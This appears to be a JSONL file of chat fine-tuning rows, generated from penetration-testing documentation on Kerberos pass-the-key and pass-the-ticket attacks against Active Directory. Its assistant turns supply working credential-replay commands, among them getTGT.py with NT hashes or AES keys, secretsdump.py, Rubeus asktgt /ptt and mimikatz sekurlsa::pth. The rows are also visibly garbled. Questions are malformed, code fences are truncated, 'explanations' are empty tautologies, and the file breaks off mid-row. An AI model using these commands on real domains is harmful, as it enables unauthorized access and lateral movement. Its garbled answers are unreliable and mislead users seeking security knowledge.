{"role": "user", "content": "Walk me through with an NT hash (overpass-the-hash)"}, {"role": "assistant", "content": "getTGT.py -hashes 'LMhash:NThash' $DOMAIN/$USER@$TARGET"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through with an NT hash (overpass-the-hash)", "response": "getTGT.py -hashes 'LMhash:NThash' $DOMAIN/$USER@$TARGET", "metadata": {"corpus_index": 667, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptk.md", "page_title": "Pass the key", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of with an AES (128 or 256 bits) key (pass-the-key)"}, {"role": "assistant", "content": "getTGT.py -aesKey 'KerberosKey' $DOMAIN/$USER@$TARGET\n``\n\nOnce a TGT is obtained, the tester can use it with the environment variable KRB5CCNAME with tools implementing pass-the-ticket.\n\nAn alternative to requesting the TGT and then passing the ticket is using the -k option in Impacket scripts. Using that option allows for passing either TGTs or STs. Example below with secretsdump.\n\n`bash\nsecretsdump.py -k -hashes 'LMhash:NThash' $DOMAIN/$USER@$TARGET\n`\n\n=== Windows\n\nOn Windows, requesting a TGT can be achieved with Rubeus (C#). The ticket will be injected in the session and Windows will natively be able to use these tickets to access given services.\n\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of with an AES (128 or 256 bits) key (pass-the-key)", "response": "getTGT.py -aesKey 'KerberosKey' $DOMAIN/$USER@$TARGET\n``\n\nOnce a TGT is obtained, the tester can use it with the environment variable KRB5CCNAME with tools implementing pass-the-ticket.\n\nAn alternative to requesting the TGT and then passing the ticket is using the -k option in Impacket scripts. Using that option allows for passing either TGTs or STs. Example below with secretsdump.\n\n`bash\nsecretsdump.py -k -hashes 'LMhash:NThash' $DOMAIN/$USER@$TARGET\n`\n\n=== Windows\n\nOn Windows, requesting a TGT can be achieved with Rubeus (C#). The ticket will be injected in the session and Windows will natively be able to use these tickets to access given services.\n\n``powershell", "metadata": {"corpus_index": 668, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptk.md", "page_title": "Pass the key", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute with an AES (128 or 256 bits) key (pass-the-key)?"}, {"role": "assistant", "content": "getTGT.py -aesKey 'KerberosKey' $DOMAIN/$USER@$TARGET\n``\n\nOnce a TGT is obtained, the tester can use it with the environment variable KRB5CCNAME with tools implementing pass-the-ticket.\n\nAn alternative to requesting the TGT and then passing the ticket is using the -k option in Impacket scripts. Using that option allows for passing either TGTs or STs. Example below with secretsdump.\n\n`bash\nsecretsdump.py -k -hashes 'LMhash:NThash' $DOMAIN/$USER@$TARGET\n`\n\n=== Windows\n\nOn Windows, requesting a TGT can be achieved with Rubeus (C#). The ticket will be injected in the session and Windows will natively be able to use these tickets to access given services.\n\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute with an AES (128 or 256 bits) key (pass-the-key)?", "response": "getTGT.py -aesKey 'KerberosKey' $DOMAIN/$USER@$TARGET\n``\n\nOnce a TGT is obtained, the tester can use it with the environment variable KRB5CCNAME with tools implementing pass-the-ticket.\n\nAn alternative to requesting the TGT and then passing the ticket is using the -k option in Impacket scripts. Using that option allows for passing either TGTs or STs. Example below with secretsdump.\n\n`bash\nsecretsdump.py -k -hashes 'LMhash:NThash' $DOMAIN/$USER@$TARGET\n`\n\n=== Windows\n\nOn Windows, requesting a TGT can be achieved with Rubeus (C#). The ticket will be injected in the session and Windows will natively be able to use these tickets to access given services.\n\n``powershell", "metadata": {"corpus_index": 668, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptk.md", "page_title": "Pass the key", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the Once command to with an aes (128 or 256 bits) key (pass-the-key)"}, {"role": "assistant", "content": "Once a TGT is obtained, the tester can use it with the environment variable `KRB5CCNAME` with tools implementing [pass-the-ticket](ptt.md).\n\nAn alternative to requesting the TGT and then passing the ticket is using the `-k` option in Impacket scripts. Using that option allows for passing either TGTs or STs. Example below with secretsdump."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the Once command to with an aes (128 or 256 bits) key (pass-the-key)", "response": "Once a TGT is obtained, the tester can use it with the environment variable `KRB5CCNAME` with tools implementing [pass-the-ticket](ptt.md).\n\nAn alternative to requesting the TGT and then passing the ticket is using the `-k` option in Impacket scripts. Using that option allows for passing either TGTs or STs. Example below with secretsdump.", "metadata": {"corpus_index": 669, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptk.md", "page_title": "Pass the key", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Once"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out with an AES (128 or 256 bits) key (pass-the-key) during a pentest?"}, {"role": "assistant", "content": "Once a TGT is obtained, the tester can use it with the environment variable `KRB5CCNAME` with tools implementing [pass-the-ticket](ptt.md).\n\nAn alternative to requesting the TGT and then passing the ticket is using the `-k` option in Impacket scripts. Using that option allows for passing either TGTs or STs. Example below with secretsdump."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out with an AES (128 or 256 bits) key (pass-the-key) during a pentest?", "response": "Once a TGT is obtained, the tester can use it with the environment variable `KRB5CCNAME` with tools implementing [pass-the-ticket](ptt.md).\n\nAn alternative to requesting the TGT and then passing the ticket is using the `-k` option in Impacket scripts. Using that option allows for passing either TGTs or STs. Example below with secretsdump.", "metadata": {"corpus_index": 669, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptk.md", "page_title": "Pass the key", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Once a TGT is obtained, the tester can use it with the environment variable `KRB5CCNAME` with tools implementing [pass-the-ticket](ptt.md).`?"}, {"role": "assistant", "content": "This command is used for with an aes (128 or 256 bits) key (pass-the-key). with an AES (128 or 256 bits) key (pass-the-key)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Once a TGT is obtained, the tester can use it with the environment variable `KRB5CCNAME` with tools implementing [pass-the-ticket](ptt.md).`?", "response": "This command is used for with an aes (128 or 256 bits) key (pass-the-key). with an AES (128 or 256 bits) key (pass-the-key)", "metadata": {"corpus_index": 669, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptk.md", "page_title": "Pass the key", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute with an AES (128 or 256 bits) key (pass-the-key)?"}, {"role": "assistant", "content": "=== Windows\n\nOn Windows, requesting a TGT can be achieved with [Rubeus](https://github.com/GhostPack/Rubeus) (C#). The ticket will be injected in the session and Windows will natively be able to use these tickets to access given services."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute with an AES (128 or 256 bits) key (pass-the-key)?", "response": "=== Windows\n\nOn Windows, requesting a TGT can be achieved with [Rubeus](https://github.com/GhostPack/Rubeus) (C#). The ticket will be injected in the session and Windows will natively be able to use these tickets to access given services.", "metadata": {"corpus_index": 670, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptk.md", "page_title": "Pass the key", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Windows`?"}, {"role": "assistant", "content": "This command is used for with an aes (128 or 256 bits) key (pass-the-key). with an AES (128 or 256 bits) key (pass-the-key)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Windows`?", "response": "This command is used for with an aes (128 or 256 bits) key (pass-the-key). with an AES (128 or 256 bits) key (pass-the-key)", "metadata": {"corpus_index": 670, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptk.md", "page_title": "Pass the key", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about with an NT hash"}, {"role": "assistant", "content": "Rubeus.exe asktgt /domain:$DOMAIN /user:$USER /rc4:$NThash /ptt"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about with an NT hash", "response": "Rubeus.exe asktgt /domain:$DOMAIN /user:$USER /rc4:$NThash /ptt", "metadata": {"corpus_index": 671, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptk.md", "page_title": "Pass the key", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for with an NT hash"}, {"role": "assistant", "content": "Rubeus.exe asktgt /domain:$DOMAIN /user:$USER /rc4:$NThash /ptt"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for with an NT hash", "response": "Rubeus.exe asktgt /domain:$DOMAIN /user:$USER /rc4:$NThash /ptt", "metadata": {"corpus_index": 671, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptk.md", "page_title": "Pass the key", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of with an AES 128 key"}, {"role": "assistant", "content": "Rubeus.exe asktgt /domain:$DOMAIN /user:$USER /aes128:$aes128_key /ptt"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of with an AES 128 key", "response": "Rubeus.exe asktgt /domain:$DOMAIN /user:$USER /aes128:$aes128_key /ptt", "metadata": {"corpus_index": 672, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptk.md", "page_title": "Pass the key", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out with an AES 128 key during a pentest?"}, {"role": "assistant", "content": "Rubeus.exe asktgt /domain:$DOMAIN /user:$USER /aes128:$aes128_key /ptt"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out with an AES 128 key during a pentest?", "response": "Rubeus.exe asktgt /domain:$DOMAIN /user:$USER /aes128:$aes128_key /ptt", "metadata": {"corpus_index": 672, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptk.md", "page_title": "Pass the key", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about with an AES 256 key"}, {"role": "assistant", "content": "Rubeus.exe asktgt /domain:$DOMAIN /user:$USER /aes256:$aes256_key /ptt\n``\n\nAn alternative to Rubeus is mimikatz with sekurlsa::pth.\n\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about with an AES 256 key", "response": "Rubeus.exe asktgt /domain:$DOMAIN /user:$USER /aes256:$aes256_key /ptt\n``\n\nAn alternative to Rubeus is mimikatz with sekurlsa::pth.\n\n``powershell", "metadata": {"corpus_index": 673, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptk.md", "page_title": "Pass the key", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on with an AES 256 key"}, {"role": "assistant", "content": "Rubeus.exe asktgt /domain:$DOMAIN /user:$USER /aes256:$aes256_key /ptt\n``\n\nAn alternative to Rubeus is mimikatz with sekurlsa::pth.\n\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on with an AES 256 key", "response": "Rubeus.exe asktgt /domain:$DOMAIN /user:$USER /aes256:$aes256_key /ptt\n``\n\nAn alternative to Rubeus is mimikatz with sekurlsa::pth.\n\n``powershell", "metadata": {"corpus_index": 673, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptk.md", "page_title": "Pass the key", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use An for with an aes 256 key?"}, {"role": "assistant", "content": "An alternative to Rubeus is [mimikatz](https://github.com/gentilkiwi/mimikatz) with [`sekurlsa::pth`](https://tools.thehacker.recipes/mimikatz/modules/sekurlsa/pth)."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use An for with an aes 256 key?", "response": "An alternative to Rubeus is [mimikatz](https://github.com/gentilkiwi/mimikatz) with [`sekurlsa::pth`](https://tools.thehacker.recipes/mimikatz/modules/sekurlsa/pth).", "metadata": {"corpus_index": 674, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptk.md", "page_title": "Pass the key", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "An"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for with an AES 256 key"}, {"role": "assistant", "content": "An alternative to Rubeus is [mimikatz](https://github.com/gentilkiwi/mimikatz) with [`sekurlsa::pth`](https://tools.thehacker.recipes/mimikatz/modules/sekurlsa/pth)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for with an AES 256 key", "response": "An alternative to Rubeus is [mimikatz](https://github.com/gentilkiwi/mimikatz) with [`sekurlsa::pth`](https://tools.thehacker.recipes/mimikatz/modules/sekurlsa/pth).", "metadata": {"corpus_index": 674, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptk.md", "page_title": "Pass the key", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `An alternative to Rubeus is [mimikatz](https://github.com/gentilkiwi/mimikatz) with [`sekurlsa::pth`](https://tools.thehacker.recipes/mimikatz/modules/sekurlsa/pth).`?"}, {"role": "assistant", "content": "This command is used for with an aes 256 key. with an AES 256 key"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `An alternative to Rubeus is [mimikatz](https://github.com/gentilkiwi/mimikatz) with [`sekurlsa::pth`](https://tools.thehacker.recipes/mimikatz/modules/sekurlsa/pth).`?", "response": "This command is used for with an aes 256 key. with an AES 256 key", "metadata": {"corpus_index": 674, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptk.md", "page_title": "Pass the key", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about with an NT hash"}, {"role": "assistant", "content": "sekurlsa::pth /user:$USER /domain:$DOMAIN /rc4:$NThash /ptt"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about with an NT hash", "response": "sekurlsa::pth /user:$USER /domain:$DOMAIN /rc4:$NThash /ptt", "metadata": {"corpus_index": 675, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptk.md", "page_title": "Pass the key", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for with an NT hash"}, {"role": "assistant", "content": "sekurlsa::pth /user:$USER /domain:$DOMAIN /rc4:$NThash /ptt"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for with an NT hash", "response": "sekurlsa::pth /user:$USER /domain:$DOMAIN /rc4:$NThash /ptt", "metadata": {"corpus_index": 675, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptk.md", "page_title": "Pass the key", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe with an AES 128 key in the context of penetration testing"}, {"role": "assistant", "content": "sekurlsa::pth /user:$USER /domain:$DOMAIN /aes128:$aes128_key /ptt"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe with an AES 128 key in the context of penetration testing", "response": "sekurlsa::pth /user:$USER /domain:$DOMAIN /aes128:$aes128_key /ptt", "metadata": {"corpus_index": 676, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptk.md", "page_title": "Pass the key", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do with an AES 128 key"}, {"role": "assistant", "content": "sekurlsa::pth /user:$USER /domain:$DOMAIN /aes128:$aes128_key /ptt"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do with an AES 128 key", "response": "sekurlsa::pth /user:$USER /domain:$DOMAIN /aes128:$aes128_key /ptt", "metadata": {"corpus_index": 676, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptk.md", "page_title": "Pass the key", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does with an AES 256 key work?"}, {"role": "assistant", "content": "sekurlsa::pth /user:$USER /domain:$DOMAIN /aes256:$aes256_key /ptt\n``\n\nFor both mimikatz and Rubeus, the /ptt` flag is used to automatically inject the ticket.\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does with an AES 256 key work?", "response": "sekurlsa::pth /user:$USER /domain:$DOMAIN /aes256:$aes256_key /ptt\n``\n\nFor both mimikatz and Rubeus, the /ptt` flag is used to automatically inject the ticket.\n\n:::", "metadata": {"corpus_index": 677, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptk.md", "page_title": "Pass the key", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for with an AES 256 key?"}, {"role": "assistant", "content": "sekurlsa::pth /user:$USER /domain:$DOMAIN /aes256:$aes256_key /ptt\n``\n\nFor both mimikatz and Rubeus, the /ptt` flag is used to automatically inject the ticket.\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for with an AES 256 key?", "response": "sekurlsa::pth /user:$USER /domain:$DOMAIN /aes256:$aes256_key /ptt\n``\n\nFor both mimikatz and Rubeus, the /ptt` flag is used to automatically inject the ticket.\n\n:::", "metadata": {"corpus_index": 677, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptk.md", "page_title": "Pass the key", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Pass the ticket - Theory in the context of penetration testing"}, {"role": "assistant", "content": "There are ways to come across (cached Kerberos tickets) or forge (overpass the hash, silver ticket and golden ticket attacks) Kerberos tickets. A ticket can then be used to authenticate to a system using Kerberos without knowing any password. This is called Pass the ticket. Another name for this is Pass the Cache (when using tickets from, or found on, UNIX-like systems)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Pass the ticket - Theory in the context of penetration testing", "response": "There are ways to come across (cached Kerberos tickets) or forge (overpass the hash, silver ticket and golden ticket attacks) Kerberos tickets. A ticket can then be used to authenticate to a system using Kerberos without knowing any password. This is called Pass the ticket. Another name for this is Pass the Cache (when using tickets from, or found on, UNIX-like systems).", "metadata": {"corpus_index": 678, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Pass the ticket - Theory during a pentest?"}, {"role": "assistant", "content": "There are ways to come across (cached Kerberos tickets) or forge (overpass the hash, silver ticket and golden ticket attacks) Kerberos tickets. A ticket can then be used to authenticate to a system using Kerberos without knowing any password. This is called Pass the ticket. Another name for this is Pass the Cache (when using tickets from, or found on, UNIX-like systems)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Pass the ticket - Theory during a pentest?", "response": "There are ways to come across (cached Kerberos tickets) or forge (overpass the hash, silver ticket and golden ticket attacks) Kerberos tickets. A ticket can then be used to authenticate to a system using Kerberos without knowing any password. This is called Pass the ticket. Another name for this is Pass the Cache (when using tickets from, or found on, UNIX-like systems).", "metadata": {"corpus_index": 678, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Pass the ticket - Practice?"}, {"role": "assistant", "content": "> [!TIP] convert tickets UNIX <-> Windows\n> Using ticketConverter.py (from the Impacket suite, written in Python).\n> \n> ``bash\n> # Windows -> UNIX\n> ticketConverter.py $ticket.kirbi $ticket.ccache\n> \n> # UNIX -> Windows\n> ticketConverter.py $ticket.ccache $ticket.kirbi\n> ``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Pass the ticket - Practice?", "response": "> [!TIP] convert tickets UNIX <-> Windows\n> Using ticketConverter.py (from the Impacket suite, written in Python).\n> \n> ``bash\n> # Windows -> UNIX\n> ticketConverter.py $ticket.kirbi $ticket.ccache\n> \n> # UNIX -> Windows\n> ticketConverter.py $ticket.ccache $ticket.kirbi\n> ``", "metadata": {"corpus_index": 679, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Pass the ticket - Practice"}, {"role": "assistant", "content": "> [!TIP] convert tickets UNIX <-> Windows\n> Using ticketConverter.py (from the Impacket suite, written in Python).\n> \n> ``bash\n> # Windows -> UNIX\n> ticketConverter.py $ticket.kirbi $ticket.ccache\n> \n> # UNIX -> Windows\n> ticketConverter.py $ticket.ccache $ticket.kirbi\n> ``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Pass the ticket - Practice", "response": "> [!TIP] convert tickets UNIX <-> Windows\n> Using ticketConverter.py (from the Impacket suite, written in Python).\n> \n> ``bash\n> # Windows -> UNIX\n> ticketConverter.py $ticket.kirbi $ticket.ccache\n> \n> # UNIX -> Windows\n> ticketConverter.py $ticket.ccache $ticket.kirbi\n> ``", "metadata": {"corpus_index": 679, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptt.md", "page_title": "Pass the ticket", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Pass the ticket - Injecting the ticket"}, {"role": "assistant", "content": "* On Windows systems, tools like Mimikatz and Rubeus inject the ticket in memory. Native Microsoft tools can then use the ticket just like usual.\n* On UNIX-like systems, the path to the .ccache ticket to use has to be referenced in the environment variable KRB5CCNAME\n\n::: tabs\n\n=== UNIX-like\n\nOnce a ticket is obtained/created, it needs to be referenced in the KRB5CCNAME environment variable for it to be used by others tools.\n\n``bash\nexport KRB5CCNAME=$path_to_ticket.ccache\n`\n\n=== Windows\n\nThe most simple way of injecting the ticket is to supply the /ptt flag directly to the command used to request/create a ticket. Both mimikatz and Rubeus accept this flag.\n\nThis can also be done manually with mimikatz using kerberos::ptt or Rubeus.\n\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Pass the ticket - Injecting the ticket", "response": "* On Windows systems, tools like Mimikatz and Rubeus inject the ticket in memory. Native Microsoft 